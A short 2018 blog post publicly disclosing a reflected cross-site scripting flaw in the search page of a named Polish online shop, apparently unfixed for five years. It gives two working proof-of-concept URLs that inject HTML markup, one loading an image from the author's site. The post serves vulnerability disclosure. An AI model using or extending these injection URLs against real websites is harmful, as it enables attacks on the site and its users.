Webroot's polish online shop vulnerable to the same XSS for 5 years

I discovered XSS vulnerability on Webroot's polish online shop 5 years ago. Today I thought that maybe I should check whether they learn from past mistakes. I have checked the same page: http://wrpolska.pl/sklep/search.php and it turned out to be still vulnerable to the same XSS I found 5 years ago...

PoC:

Code
http://wrpolska.pl/sklep/search.php?orderby=position&orderway=desc&search_query="><h1>XSS found by Team Elite</h1>

Code
http://wrpolska.pl/sklep/search.php?orderby=position&orderway=desc&search_query="><img src=http://te-home.net/images/logo.png>





Webroot has an article on their website titled: What exactly is Cross Site Scripting (XSS). Maybe it's time to use knowledge from this article to protect yourself?

Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Posted by Neo on 2018-11-08 21:502 likes

Comments

There are no comments for this news article, you can leave one here.
← Next • FlylinkDC++ r504 →